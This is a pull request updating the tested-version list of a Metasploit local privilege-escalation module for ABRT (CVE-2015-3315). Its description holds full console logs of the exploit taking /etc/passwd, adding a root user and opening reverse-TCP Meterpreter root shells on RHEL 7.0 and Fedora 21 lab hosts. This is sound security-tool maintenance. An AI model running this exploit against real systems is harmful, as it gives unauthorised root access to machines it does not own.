### PR TITLE
Update tested versions for abrt_raceabrt_priv_esc module

### DIFF
--- a/documentation/modules/exploit/linux/local/abrt_raceabrt_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/abrt_raceabrt_priv_esc.md
@@ -1,19 +1,25 @@
 ## Description
 
-  This module attempts to gain root privileges on Fedora systems with a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured as the crash handler.
+  This module attempts to gain root privileges on Linux systems with
+  a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
+  as the crash handler.
 
 
 ## Vulnerable Application
 
-  A race condition in ABRT allows local users to change ownership of arbitrary files (CVE-2015-3315). This module uses a symlink attack on `/var/tmp/abrt/*/maps` to change the ownership of `/etc/passwd`, then adds a new user with UID=0 GID=0 to gain root privileges. Winning the race could take a few minutes.
+  A race condition allows local users to change ownership of arbitrary
+  files (CVE-2015-3315). This module uses a symlink attack on
+  `/var/tmp/abrt/*/maps` to change the ownership of `/etc/passwd`,
+  then adds a new user with UID=0 GID=0 to gain root privileges.
+  Winning the race could take a few minutes.
 
-  This module has been tested successfully on ABRT packaged versions:
+  This module has been tested successfully on:
 
-  * 2.1.5-1.fc19 on Fedora Desktop 19 x86_64
-  * 2.2.1-1.fc19 on Fedora Desktop 19 x86_64
-  * 2.2.2-2.fc20 on Fedora Desktop 20 x86_64
-
-  Fedora 21 and Red Hat 7 systems are reportedly affected, but untested.
+  * abrt 2.1.11-12.el7 on RHEL 7.0 x86_64
+  * abrt 2.1.5-1.fc19 on Fedora Desktop 19 x86_64
+  * abrt 2.2.1-1.fc19 on Fedora Desktop 19 x86_64
+  * abrt 2.2.2-2.fc20 on Fedora Desktop 20 x86_64
+  * abrt 2.3.0-3.fc21 on Fedora Desktop 21 x86_64
 
 
 ## Verification Steps

--- a/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb
+++ b/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb
@@ -14,21 +14,23 @@ class MetasploitModule < Msf::Exploit::Local
     super(update_info(info,
       'Name'           => 'ABRT raceabrt Privilege Escalation',
       'Description'    => %q{
-        This module attempts to gain root privileges on Fedora systems with
+        This module attempts to gain root privileges on Linux systems with
         a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
         as the crash handler.
 
         A race condition allows local users to change ownership of arbitrary
         files (CVE-2015-3315). This module uses a symlink attack on
-        '/var/tmp/abrt/*/maps' to change the ownership of /etc/passwd,
+        `/var/tmp/abrt/*/maps` to change the ownership of `/etc/passwd`,
         then adds a new user with UID=0 GID=0 to gain root privileges.
         Winning the race could take a few minutes.
 
-        This module has been tested successfully on ABRT packaged version
-        2.1.5-1.fc19 on Fedora Desktop 19 x86_64, 2.2.1-1.fc19 on Fedora Desktop
-        19 x86_64 and 2.2.2-2.fc20 on Fedora Desktop 20 x86_64.
+        This module has been tested successfully on:
 
-        Fedora 21 and Red Hat 7 systems are reportedly affected, but untested.
+        abrt 2.1.11-12.el7 on RHEL 7.0 x86_64;
+        abrt 2.1.5-1.fc19 on Fedora Desktop 19 x86_64;
+        abrt 2.2.1-1.fc19 on Fedora Desktop 19 x86_64;
+        abrt 2.2.2-2.fc20 on Fedora Desktop 20 x86_64;
+        abrt 2.3.0-3.fc21 on Fedora Desktop 21 x86_64.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>


### PR DESCRIPTION
Update tested versions for abrt_raceabrt_priv_esc module.

Tested on command shell and Meterpreter sessions.


### RHEL 7.0

```
msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > check

[!] SESSION may not be compatible with this module.
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.1.11-12.el7
[*] The target service is running, but could not be validated.
msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.1.11-12.el7
[*] Writing '/tmp/.bYJaoW' (64240 bytes) ...
[*] Max line length is 65537
[*] Writing 64240 bytes in 4 chunks of 55900 bytes (octal-encoded), using printf
[*] Next chunk is 49545 bytes
[*] Next chunk is 47887 bytes
[*] Next chunk is 41961 bytes
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[*] -rw-r--r--. 1 user abrt 1908 May 20  2018 /etc/passwd
[+] Success! '/etc/passwd' is writable
[*] Adding sCuYQlsSFr user to /etc/passwd ...
[*] Writing '/tmp/.Sk5EWf' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 630 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.151
[*] Meterpreter session 3 opened (172.16.191.165:4444 -> 172.16.191.151:50689) at 2019-04-18 03:58:51 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > cat /etc/redhat-release
Red Hat Enterprise Linux Server release 7.0 (Maipo)
meterpreter > shell
Process 15206 created.
Channel 3 created.
uname -a
Linux localhost.localdomain 3.10.0-123.el7.x86_64 #1 SMP Mon May 5 11:16:57 EDT 2014 x86_64 x86_64 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

```

### Fedora 21

```
msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > check

[!] SESSION may not be compatible with this module.
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.3.0-3.fc21
[*] The target service is running, but could not be validated.
msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.3.0-3.fc21
[*] Writing '/tmp/.xO41vQvqxt' (64240 bytes) ...
[*] Max line length is 65537
[*] Writing 64240 bytes in 4 chunks of 55896 bytes (octal-encoded), using printf
[*] Next chunk is 49542 bytes
[*] Next chunk is 47886 bytes
[*] Next chunk is 41969 bytes
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[*] -rw-r--r--. 1 user abrt 2341 May  5  2018 /etc/passwd
[+] Success! '/etc/passwd' is writable
[*] Adding cqwjGyra user to /etc/passwd ...
[*] Writing '/tmp/.WjAZxHw' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 630 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.240
[*] Meterpreter session 5 opened (172.16.191.165:4444 -> 172.16.191.240:58521) at 2019-04-18 04:09:57 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > cat /etc/issue
Fedora release 21 (Twenty One)
Kernel \r on an \m (\l)

meterpreter > shell
Process 22995 created.
Channel 3 created.
uname -a
Linux localhost.localdomain 3.17.4-301.fc21.x86_64 #1 SMP Thu Nov 27 19:09:10 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

```
